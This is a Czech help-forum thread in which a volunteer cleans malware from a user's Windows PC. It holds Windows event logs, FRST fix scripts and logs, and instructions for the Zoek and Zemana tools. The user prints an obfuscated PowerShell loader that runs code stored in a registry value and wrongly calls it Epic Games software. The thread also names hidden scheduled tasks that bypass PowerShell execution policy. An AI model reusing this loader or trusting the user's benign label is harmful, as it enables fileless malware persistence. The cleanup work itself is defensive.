Error: (11/07/2022 05:09:31 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Při čekání na připojení služby Browser bylo dosaženo časového limitu (120000 ms).

Error: (11/07/2022 05:09:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Služba Browser neuspěla při spuštění v důsledku následující chyby:
Služba neodpověděla na řídicí nebo zahajovací požadavek dostatečně včas.

Error: (11/07/2022 05:09:31 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Při čekání na připojení služby Browser bylo dosaženo časového limitu (120000 ms).

Error: (11/07/2022 05:09:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Služba Browser neuspěla při spuštění v důsledku následující chyby:
Služba neodpověděla na řídicí nebo zahajovací požadavek dostatečně včas.

Error: (11/07/2022 05:09:31 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Při čekání na připojení služby Browser bylo dosaženo časového limitu (120000 ms).

Error: (11/07/2022 05:07:26 PM) (Source: Server) (EventID: 2505) (User: )
Description: Server nemohl vytvořit vazbu na přenos \Device\NetBT_Tcpip_{E34A0E74-B114-4D52-943C-B674323E6033}, protože jiný počítač v síti má stejný název. Server nelze spustit.

Error: (11/07/2022 05:07:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Služba Browser neuspěla při spuštění v důsledku následující chyby:
Služba neodpověděla na řídicí nebo zahajovací požadavek dostatečně včas.


Windows Defender:
================
Date: 2022-11-07 17:59:32
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {355DC3F2-10FD-46DA-84D4-910FF6CD4EA6}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2022-11-07 17:07:34
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {7FC8860F-3B2A-4373-B351-309BC0F59CA4}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2022-11-07 16:54:43
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {3DF4E607-4B1E-42E5-B720-26281E620DC1}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2022-11-03 17:37:28
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {36737B8A-B6E8-4052-B7EB-E4C5B1513503}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2022-11-02 18:12:43
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {BECD1A0B-6F44-47F0-949D-2F2F8D95ADF8}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

CodeIntegrity:
===============
Date: 2022-10-28 16:37:37
Description:
Code Integrity determined that a process (\Device\HarddiskVolume9\ProgramData\Microsoft\Windows Defender\Platform\4.18.2209.7-0\MsMpEng.exe) attempted to load \Device\HarddiskVolume9\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_11001eacf352e253\igd10iumd64.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

BIOS: American Megatrends Inc. E17F2IMS.109 05/19/2020
Motherboard: Micro-Star International Co., Ltd. MS-17F2
Processor: Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz
Percentage of memory in use: 28%
Total physical RAM: 16227.41 MB
Available physical RAM: 11538.38 MB
Total Virtual: 21560.68 MB
Available Virtual: 15413.1 MB

==================== Drives ================================

Drive c: (Windows) (Fixed) (Total:458 GB) (Free:124.98 GB) (Model: WDC PC SN520 SDAPNUW-512G-1032) NTFS
Drive d: () (Fixed) (Total:436.6 GB) (Free:166.57 GB) (Model: ADATA SU800) NTFS
Drive e: (Nový svazek) (Fixed) (Total:39.06 GB) (Free:31.22 GB) (Model: ADATA SU800) NTFS
Drive z: (SYSTEM) (Fixed) (Total:0.29 GB) (Free:0.26 GB) (Model: WDC PC SN520 SDAPNUW-512G-1032) FAT32

\\?\Volume{ac5adbe9-eb71-4de3-b174-579b4d3f00f2}\ (WinRE tools) (Fixed) (Total:0.88 GB) (Free:0.37 GB) NTFS
\\?\Volume{68105432-156c-48c2-9dc5-3545d3fd71f2}\ (BIOS_RVY) (Fixed) (Total:17.64 GB) (Free:1.57 GB) NTFS
\\?\Volume{288c0601-9bd2-444b-aa81-fe8d4391276a}\ (Obnovení) (Fixed) (Total:0.52 GB) (Free:0.5 GB) NTFS
\\?\Volume{efae0b03-5c84-4269-92d7-bad382baf154}\ () (Fixed) (Total:0.65 GB) (Free:0.08 GB) NTFS
\\?\Volume{fd454674-a2ed-4e9b-bd44-f23aa0e44192}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 476.9 GB) (Disk ID: FF7B3DBC)

Partition: GPT.

==========================================================
Disk: 1 (Size: 476.9 GB) (Disk ID: 0457B8AF)

Partition: GPT.

==================== End of Addition.txt =======================

[jaro3]

Prosím, postupuj následujícím způsobem:
Otevřít poznámkový blok (Start => Všechny programy => Příslušenství => Poznámkový blok).
Prosím, zkopíruj do něj celý obsah níže.

Kód: Vybrat vše

Start
CreateRestorePoint:
CloseProcesses:
HKLM\...\Policies\Explorer: [HideSCAMeetNow] 1
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Policies\Explorer: [HideSCAMeetNow] 1
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Policies\Explorer: [NolowDiskSpaceChecks] 1
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\MountPoints2: {4da3b049-162e-11ed-8c8f-4889e716f2dc} - "F:\Lenovo_Suite.exe"
HKU\S-1-5-18\...\Run: [RazerAxon] => "C:\Program Files (x86)\Razer\Razer Axon\RazerAxon.exe" -autorun (No File)
ShortcutTarget: DeepL auto-start.lnk -> (No File)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Edge: Restriction <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Policies\Microsoft\Edge: Restriction <==== ATTENTION
Task: {00AAE17D-5854-4922-8396-86326F51A6D2} - System32\Tasks\update-S-1-5-21-3110588475-2115266248-3539613761-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (No File)
Task: {52510CA0-CD65-48FC-99C5-CF57314CEC65} - \Microsoft\Windows\Management\Provisioning\xiHM0g\046E4CE2-D25A-4B57-A2E2-3AD7D55DFBDB -> No File <==== ATTENTION
Task: {5FDD0220-E4B9-4462-AC20-4D9BDB16070E} - System32\Tasks\Microsoft\Windows\Management\Provisioning\User => powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\WINDOWS\System32\57540306-c3ad-454f-bbe7-1c56160757fe.ps1" <==== ATTENTION
Task: {6A7B9D49-E5BF-4199-8990-7D182ADBB306} - System32\Tasks\GoogleUpdateTaskMachineCore{07D74F8D-CE32-4182-A77B-CF36AB803647} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-09-26] (Google LLC -> Google LLC)
Task: {96BB2A72-BBD3-4A21-B7F2-C23A745E8678} - System32\Tasks\Microsoft\Windows\MUI\LPRemovea93Lqu => powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\D5910F34-9B2F-4E01-80CF-49460B7AF191.ps1" <==== ATTENTION
Task: {B2F82E57-5A82-46F4-88DC-C41367AF04D9} - System32\Tasks\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-09-26] (Google LLC -> Google LLC)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => C:\WINDOWS\System32\MbaeParserTask.exe (No File)
Task: {F3ED570E-C6D2-4C9E-964E-E3430B16320F} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (No File)
Winsock: Catalog9 17 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog9 18 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog9-x64 17 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog9-x64 18 %windir%\system32\vsocklib.dll => No File
CHR HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee]
C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440}
FCheck: C:\WINDOWS\SysWOW64\version_IObitDel.dll [2021-04-03] <==== ATTENTION (zero byte File/Folder)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2\InprocServer32 -> => No File
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32 -> => No File
ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File
ContextMenuHandlers4: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
ContextMenuHandlers5: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File
ContextMenuHandlers6: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\regfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.reg: regfile => <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\batfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.bat: batfile => <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\cmdfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.cmd: cmdfile => <==== ATTENTION
FirewallRules: [{395B3311-5A73-4561-9758-481CD398A729}] => (Block) PCBS.exe => No File

Virustotal: C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Virustotal: C:\WINDOWS\system32\7CB70479-6581-4B43-912B-52A357E12051.ps1
Virustotal: C:\Users\Woytman\AppData\Roaming\nuvotonISP.lua

HOSTS:
EmptyTemp:
End

(Můžeš použít funkci „vybrat vše“, klepni pravým tlačítkem myši na levé horní políčko v otevřeném poznámkovém bloku a zvol „ Vložit“).

Ulož jej na na plochu jako fixlist.txt


Spusťt FRST a stiskni tlačítko „Fix“ (Opravit) jen jednou a čekej.
Nástroj vypracuje log na ploše (Fixlog.txt), prosím zkopíruj sem celý jeho obsah.

Znáš ty zvýrazněné složky/soubory?
C:\Users\Woytman\klkcjajbnhfgbomfdfpaojadidaapeni složka?
C:\Users\Woytman\AppData\Local\unali-40699656 složka?
C:\Users\Woytman\AppData\Local\unali-40699531 složka?
C:\WINDOWS\system32\7CB70479-6581-4B43-912B-52A357E12051.ps1

[autoprd]

soubor v system32 koncovkou .ps1 patří k epicgames

Kód: Vybrat vše

$LZhhZzKBhoaF=[ScriptBlock];$ipKxngQOCHKQPg=[string];$tARKNuqkZQb=[char]; icm ($LZhhZzKBhoaF::Create($ipKxngQOCHKQPg::Join('', ((gp 'HKLM:\SOFTWARE\EpicGamessxg1P').'8ICNbJnUCK' | % { [char]$_ }))))

Raději smažu, pokud to ovlivní EpicGames, dá o sobě vědět :)

C:\Users\Woytman\AppData\Local\unali-40699656
C:\Users\Woytman\AppData\Local\unali-40699531
Bylo prázdné, smazal jsem.

C:\Users\Woytman\klkcjajbnhfgbomfdfpaojadidaapeni
nedohledal jsem, nespíše to byl TEMP k nějakému programu, který CCleaner smazal

Btw:SkillBrains v logu - jedná se o LightShot, program pro screenshoty, je to čisté jen to falešně označují za vir.

Jdu na log

[autoprd]

Fix result of Farbar Recovery Scan Tool (x64) Version: 06-11-2022
Ran by Woytman (08-11-2022 19:20:08) Run:1
Running from C:\Users\Woytman\Desktop
Loaded Profiles: Woytman
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
CreateRestorePoint:
CloseProcesses:
HKLM\...\Policies\Explorer: [HideSCAMeetNow] 1
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Policies\Explorer: [HideSCAMeetNow] 1
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Policies\Explorer: [NolowDiskSpaceChecks] 1
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\MountPoints2: {4da3b049-162e-11ed-8c8f-4889e716f2dc} - "F:\Lenovo_Suite.exe"
HKU\S-1-5-18\...\Run: [RazerAxon] => "C:\Program Files (x86)\Razer\Razer Axon\RazerAxon.exe" -autorun (No File)
ShortcutTarget: DeepL auto-start.lnk -> (No File)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Edge: Restriction <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Policies\Microsoft\Edge: Restriction <==== ATTENTION
Task: {00AAE17D-5854-4922-8396-86326F51A6D2} - System32\Tasks\update-S-1-5-21-3110588475-2115266248-3539613761-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (No File)
Task: {52510CA0-CD65-48FC-99C5-CF57314CEC65} - \Microsoft\Windows\Management\Provisioning\xiHM0g\046E4CE2-D25A-4B57-A2E2-3AD7D55DFBDB -> No File <==== ATTENTION
Task: {5FDD0220-E4B9-4462-AC20-4D9BDB16070E} - System32\Tasks\Microsoft\Windows\Management\Provisioning\User => powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\WINDOWS\System32\57540306-c3ad-454f-bbe7-1c56160757fe.ps1" <==== ATTENTION
Task: {6A7B9D49-E5BF-4199-8990-7D182ADBB306} - System32\Tasks\GoogleUpdateTaskMachineCore{07D74F8D-CE32-4182-A77B-CF36AB803647} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-09-26] (Google LLC -> Google LLC)
Task: {96BB2A72-BBD3-4A21-B7F2-C23A745E8678} - System32\Tasks\Microsoft\Windows\MUI\LPRemovea93Lqu => powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\D5910F34-9B2F-4E01-80CF-49460B7AF191.ps1" <==== ATTENTION
Task: {B2F82E57-5A82-46F4-88DC-C41367AF04D9} - System32\Tasks\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-09-26] (Google LLC -> Google LLC)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => C:\WINDOWS\System32\MbaeParserTask.exe (No File)
Task: {F3ED570E-C6D2-4C9E-964E-E3430B16320F} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (No File)
Winsock: Catalog9 17 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog9 18 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog9-x64 17 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog9-x64 18 %windir%\system32\vsocklib.dll => No File
CHR HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee]
C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440}
FCheck: C:\WINDOWS\SysWOW64\version_IObitDel.dll [2021-04-03] <==== ATTENTION (zero byte File/Folder)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2\InprocServer32 -> => No File
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32 -> => No File
ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File
ContextMenuHandlers4: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
ContextMenuHandlers5: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File
ContextMenuHandlers6: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\regfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.reg: regfile => <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\batfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.bat: batfile => <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\cmdfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.cmd: cmdfile => <==== ATTENTION
FirewallRules: [{395B3311-5A73-4561-9758-481CD398A729}] => (Block) PCBS.exe => No File

Virustotal: C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Virustotal: C:\WINDOWS\system32\7CB70479-6581-4B43-912B-52A357E12051.ps1
Virustotal: C:\Users\Woytman\AppData\Roaming\nuvotonISP.lua

HOSTS:
EmptyTemp:
End
*****************

Restore point was successfully created.
Processes closed successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideSCAMeetNow" => removed successfully
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => removed successfully
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate => removed successfully
"HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideSCAMeetNow" => removed successfully
"HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NolowDiskSpaceChecks" => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4da3b049-162e-11ed-8c8f-4889e716f2dc} => removed successfully
"HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\RazerAxon" => removed successfully
"ShortcutTarget: DeepL auto-start.lnk -> (No File)" => not found
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => moved successfully
C:\ProgramData\NTUSER.pol => moved successfully
HKLM\SOFTWARE\Policies\Microsoft\Edge => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Policies\Microsoft\Edge => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{00AAE17D-5854-4922-8396-86326F51A6D2}" => not found
"C:\WINDOWS\System32\Tasks\update-S-1-5-21-3110588475-2115266248-3539613761-1001" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\update-S-1-5-21-3110588475-2115266248-3539613761-1001" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{52510CA0-CD65-48FC-99C5-CF57314CEC65}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{52510CA0-CD65-48FC-99C5-CF57314CEC65}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\xiHM0g\046E4CE2-D25A-4B57-A2E2-3AD7D55DFBDB" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5FDD0220-E4B9-4462-AC20-4D9BDB16070E}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5FDD0220-E4B9-4462-AC20-4D9BDB16070E}" => removed successfully
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Management\Provisioning\User => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\User" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6A7B9D49-E5BF-4199-8990-7D182ADBB306}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6A7B9D49-E5BF-4199-8990-7D182ADBB306}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore{07D74F8D-CE32-4182-A77B-CF36AB803647} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore{07D74F8D-CE32-4182-A77B-CF36AB803647}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{96BB2A72-BBD3-4A21-B7F2-C23A745E8678}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{96BB2A72-BBD3-4A21-B7F2-C23A745E8678}" => removed successfully
C:\WINDOWS\System32\Tasks\Microsoft\Windows\MUI\LPRemovea93Lqu => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\MUI\LPRemovea93Lqu" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B2F82E57-5A82-46F4-88DC-C41367AF04D9}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B2F82E57-5A82-46F4-88DC-C41367AF04D9}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CCDFC0B8-01A3-4E74-A820-4F13F51D269E}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CCDFC0B8-01A3-4E74-A820-4F13F51D269E}" => removed successfully
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F3ED570E-C6D2-4C9E-964E-E3430B16320F}" => not found
"C:\WINDOWS\System32\Tasks\update-sys" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\update-sys" => not found
HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000017 => removed successfully
HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000018 => removed successfully
HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000017 => removed successfully
HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000018 => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Google\Chrome\Extensions\bbjllphbppobebmjpjcijfbakobcheof => removed successfully
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\aegnopegbbhjeeiganiajffnalhlkkjb => removed successfully
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\ihcjicgdanjaechkgeegckofjjedodee => removed successfully
"C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440}" => not found
C:\WINDOWS\SysWOW64\version_IObitDel.dll => moved successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2 => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2} => removed successfully
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\ FileSyncEx => removed successfully
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\Offline Files => removed successfully
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\ FileSyncEx => removed successfully
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\Offline Files => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\regfile => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.reg => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\batfile => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.bat => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\cmdfile => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.cmd => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{395B3311-5A73-4561-9758-481CD398A729}" => removed successfully
"VirusTotal: C:\Program Files (x86)\Skillbrains\Updater\Updater.exe" => not found
"VirusTotal: C:\WINDOWS\system32\7CB70479-6581-4B43-912B-52A357E12051.ps1" => not found
VirusTotal: C:\Users\Woytman\AppData\Roaming\nuvotonISP.lua => https://www.virustotal.com/gui/file/c94 ... 1667931630
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

FlushDNS => completed
BITS transfer queue => 1310720 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 10742843 B
Java, Discord, Steam htmlcache, WinHttpAutoProxySvc/winhttp *.cache => 380491127 B
Windows/system/drivers => 2041978 B
Edge => 0 B
Chrome => 466551548 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 200143 B
LocalService => 200143 B
NetworkService => 202041 B
Woytman => 57666520 B

RecycleBin => 0 B
EmptyTemp: => 876.8 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 19:21:22 ====

[jaro3]

Vypni antivir i firewall, RogueKiller, Malwarebytes Antimalware, windowsDefender
Stáhni zoek:
https://uloz.to/file/nFH1LwSrGioP/zoek1-rar

Zavři všechny ostatní programy , okna i prohlížeče.
Spusť Zoek.exe ( u win vista , win7, 8 klikni na něj pravým a vyber : „Spustit jako správce“
-pozor , náběh programu může trvat déle.
Do okna programu vlož skript níže:

Kód: Vybrat vše

autoclean;
resethosts;
emptyclsid;
IEdefaults;
FFdefaults;
CHRdefaults;
emptyIEcache;
emptyFFcache;
emptyCHRcache;
emptyalltemp;
emptyflash;
emptyjava;
emptyrecycle.bin;

klikni na Run Script
Program provede sken , opravu, sken i oprava může trvat i více minut ,je třeba posečkat do konce. Do okna neklikej!
Program nabídne restart , potvrď .
Po restartu se může nějaký čas ukázat pouze černá plocha , to je normální. Je třeba počkat až se vytvoří log. Ten si můžeš uložit třeba do dokumentů , jinak se sám ukládá do:
C:\zoek-results.log Zkopíruj sem celý obsah toho logu.
Pokud budou problémy , spusť zoek v nouz. režimu.


Stáhni si Zemana AntiMalware Free z tohoto odkazu:
https://www.zemana.com/Download/AntiMal ... .Setup.exe

